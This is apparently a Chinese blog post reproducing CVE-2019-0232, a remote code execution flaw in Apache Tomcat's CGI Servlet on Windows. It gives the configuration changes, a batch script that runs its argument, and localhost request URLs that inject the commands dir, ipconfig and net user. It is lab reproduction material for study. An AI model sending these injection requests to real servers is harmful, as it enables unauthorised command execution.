Apache Tomcat 远程代码执行漏洞复现(CVE-2019-0232)

发表于 | 分类于

1、漏洞信息

漏洞编号:CVE-2019-0232

漏洞名称:CVE-2019-0232-远程代码执行漏洞

影响版本:

  • Apache Tomcat 9.0.0.M1 to 9.0.17
  • Apache Tomcat 8.5.0 to 8.5.39
  • Apache Tomcat 7.0.0 to 7.0.93

漏洞描述:

​  Apache Tomcat在启用了enableCmdLineArguments的Windows上运行时,由于JRE将命令行参数传递给Windows的方式存在错误,通过此漏洞,CGI Servlet可以受到攻击者的远程执行代码攻击。
​  但是在默认情况下,Tomcat 9.0.x中禁用了CGI选项enableCmdLineArguments(默认情况下,在所有版本中都会禁用它以防御此漏洞)

测试平台:Windows

测试环境:Tomcat 8.5.39

2、漏洞验证

2.1 安装Tomcat

2.2 初始化参数

修改/apache-tomcat-8.5.39//conf/web.xml文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
    <servlet>
        <servlet-name>cgi</servlet-name>
        <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class>
        <init-param>
          <param-name>debug</param-name>
          <param-value>0</param-value>
        </init-param>
        <init-param>
          <param-name>cgiPathPrefix</param-name>
          <param-value>WEB-INF/cgi-bin</param-value>
        </init-param>
        <init-param>
          <param-name>executable</param-name>
          <param-value></param-value>
        </init-param>
         <load-on-startup>5</load-on-startup>
    </servlet> 
......
    <servlet-mapping>
        <servlet-name>cgi</servlet-name>
        <url-pattern>/cgi-bin/*</url-pattern>
    </servlet-mapping>

修改/apache-tomcat-8.5.39/conf/content.xml文件,将Context属性里面添加privileged=”true”

1
2
3
4
5
6
7
8
9
10
11
12
<Context privileged="true">

    <!-- Default set of monitored resources. If one of these changes, the    -->
    <!-- web application will be reloaded.                                   -->
    <WatchedResource>WEB-INF/web.xml</WatchedResource>
    <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

    <!-- Uncomment this to disable session persistence across Tomcat restarts -->
    <!--
    <Manager pathname="" />
    -->
</Context>

2.3 编写测试脚本

/apache-tomcat-8.5.39/webapps/ROOT/WEB-INF下创建cgi-bin目录,创建hello.bat文件

1
2
3
4
5
@echo off
echo Content-Type: text/plain
echo.
set foo=%~1
%foo%

3、复现成功

http://localhost:8080/cgi-bin/hello.bat?dir

http://localhost:8080/cgi-bin/hello.bat?C:/Windows/System32/ipconfig

http://localhost:8080/cgi-bin/hello.bat?C:/Windows/System32/net%20user

4、参考链接